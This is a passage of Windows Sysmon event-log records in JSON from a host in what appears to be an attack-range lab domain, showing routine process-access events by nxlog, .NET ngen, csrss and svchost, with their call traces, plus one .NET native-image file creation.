(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:08.748","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8999,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:09.748\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:09.748","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9000,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:10.404\r\nProcessGuid: {E2A3D6B1-13A9-5F25-0000-001019501100}\r\nProcessId: 4828\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\12dc-0\\System.dll\r\nCreationUtcTime: 2020-08-01 07:03:10.404","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:10.404","ProcessGuid":"{E2A3D6B1-13A9-5F25-0000-001019501100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\12dc-0\\System.dll","CreationUtcTime":"2020-08-01 07:03:10.404","EventReceivedTime":"2020-08-01 07:03:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9001,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:10.763\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:10.763","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9002,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:10.951\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13AE-5F25-0000-001012561100}\r\nTargetProcessId: 1292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:10.951","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13AE-5F25-0000-001012561100}","TargetProcessId":"1292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9003,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:10.951\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13AE-5F25-0000-001012561100}\r\nTargetProcessId: 1292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:10.951","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13AE-5F25-0000-001012561100}","TargetProcessId":"1292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9004,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:10.966\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13AE-5F25-0000-001012561100}\r\nTargetProcessId: 1292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:10.966","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13AE-5F25-0000-001012561100}","TargetProcessId":"1292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9005,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:11.279\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13AF-5F25-0000-001092591100}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:11.279","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13AF-5F25-0000-001092591100}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64